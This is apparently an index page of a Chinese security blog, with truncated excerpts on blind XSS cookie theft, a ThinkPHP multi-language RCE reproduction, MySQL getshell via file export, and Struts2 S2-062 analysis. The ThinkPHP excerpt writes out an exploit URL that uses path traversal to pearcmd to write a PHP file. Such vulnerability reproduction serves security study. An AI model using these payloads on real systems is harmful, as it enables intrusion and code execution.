关于XSS

EZXSS 一款XSS盲打漏洞测试工具http://caidaome.com/?post=205一些漏洞点及骚思路新用户注册存储型XSS盲打获取Cookiehttps://baijiahao.baidu.com/s?id=1700829679816535168&wfr=spider&for=pc文件上传存储型XSS盲打获取Cookiehttps://cloud.tencent.com/develo

- 阅读全文 -

【漏洞复现】ThinkPHP 多语言模块RCE

Exp# 写文件 http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php # 包含文件 http://172.17.0.2/public/index.p

- 阅读全文 -

MySQL GetShell的方法

1 导出文件1.1 利用条件1、MySQL用户对web目录具有文件导出权限(默认只有root用户有),能够使用单引号2、获得网站绝对路径3、secure_file_priv没有具体值secure_file_priv是用来限制load dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限。如下关于secure_file_priv的配置介绍secu

- 阅读全文 -

Struts2 S2-062(CVE-2021-31805)漏洞分析及复现

简介2022年4月12日,Apache发布安全公告,修复了一个Apache Struts2 中的远程代码执行漏洞S2-062(CVE-2021-31805),攻击者可以利用此漏洞来控制受影响的系统。该漏洞是由于 2020 年 S2-061(CVE-2020-17530)的不完整修复造成的,当开发人员使用了 %{…} 语法进行强制OGNL解析时,仍有一些特殊的TAG属性可被二次解析,攻击者可构造恶意

- 阅读全文 -